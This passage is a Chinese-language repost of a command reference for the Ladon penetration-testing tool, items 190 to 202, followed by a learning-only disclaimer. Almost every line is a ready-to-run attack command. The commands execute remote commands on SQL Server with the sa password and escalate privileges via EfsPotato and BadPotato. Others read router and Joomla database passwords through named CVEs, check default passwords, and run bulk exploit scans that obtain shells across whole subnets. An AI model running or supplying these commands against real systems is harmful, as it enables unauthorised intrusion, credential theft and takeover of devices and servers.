Ladon MssqlCmd 192.168.1.8 sa k8gege520 master ws_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master py_cmdshell whoami

190 MssqlCmd SQL Server远程执行命令 efspotato、badpotato提权

Ladon MssqlCmd 192.168.1.8 sa k8gege520 master install_clr
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master uninstall_clr
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_exec whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_efspotato whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_badpotato whoami

191 CVE-2018-14847 Mikrotik RouterOS 6.29-6.42版本密码读取

Ladon 192.168.1.8 CVE-2018-14847
Ladon ip.txt CVE-2018-14847

192 ZteScan 中兴路由器光猫Web默认口令检测

Ladon 192.168.1.8 ZteScan
Ladon ip.txt ZteScan
Ladon http://192.168.1.8 ZteScan
Ladon url.txt ZteScan

193 MSNSwitchPwd CVE-2022-32429 MSNSwitch路由器密码读取

Ladon https://192.168.1.8 MSNSwitchPwd
Ladon url.txt MSNSwitchPwd

194 NetGearPwd NetGear DGND3700v2路由器密码读取

Ladon https://192.168.1.8 NetGearPwd
Ladon url.txt NetGearPwd

195 T3协议探测WebLogic版本

Ladon 192.168.1.8/24 T3Info
Ladon 192.168.1.8:7001 T3Info
Ladon http://192.168.1.8:7001 T3Info

一键渗透 InfoScan AllScan PocScan ExpScan VerScan

196 InfoScan多个模块探测系统信息

Ladon 192.168.1.8/24 InfoScan
Ladon 192.168.1.8 InfoScan
Ladon ip.txt InfoScan

197 VulScan PocScan多个远程漏洞检测

Ladon 192.168.1.8/24 VulScan
Ladon 192.168.1.8 PocScan
Ladon http://192.168.1.8 PocScan

198 ExpScan多个漏洞利用GetShell

Ladon 192.168.1.8/24 ExpScan
Ladon 192.168.1.8 ExpScan
Ladon http://192.168.1.8 ExpScan

199 JoomlaPwd CVE-2023-23752 未授权网站数据库密码读取

Ladon 192.168.1.8/24 JoomlaPwd
Ladon 192.168.1.8 JoomlaPwd
Ladon http://192.168.1.8 JoomlaPwd
Ladon url.txt JoomlaPwd

200 AllScan 所有模块

Ladon 192.168.1.8/24 AllScan
Ladon 192.168.1.8 AllScan
Ladon http://192.168.1.8 AllScan

201 探测Citrix Gateway版本

Ladon https://192.168.1.8 CitrixVer
Ladon 192.168.1.8/24 CitrixVer
Ladon url.txt CitrixVer

202 探测Vmware Vcenter版本

Ladon https://192.168.1.8 VmwareVer
Ladon 192.168.1.8/24 VmwareVer

Ladon url.txt VcenterVer

文章转载自github的 K8gege 师傅，原文链接如下：https://xz.aliyun.com/t/10584

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！

如侵权请私聊我们删文

END

多一个点在看多一条小鱼干

文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650568034&idx=4&sn=ce9bd3850db9179fbbceedd5b39678a3&chksm=83bd1086b4ca9990cd7425226612978bbc6e0d4651f3d9ab94ba57a046ba63c4f6194db5b73d#rd
如有侵权请联系:admin#unsafe.sh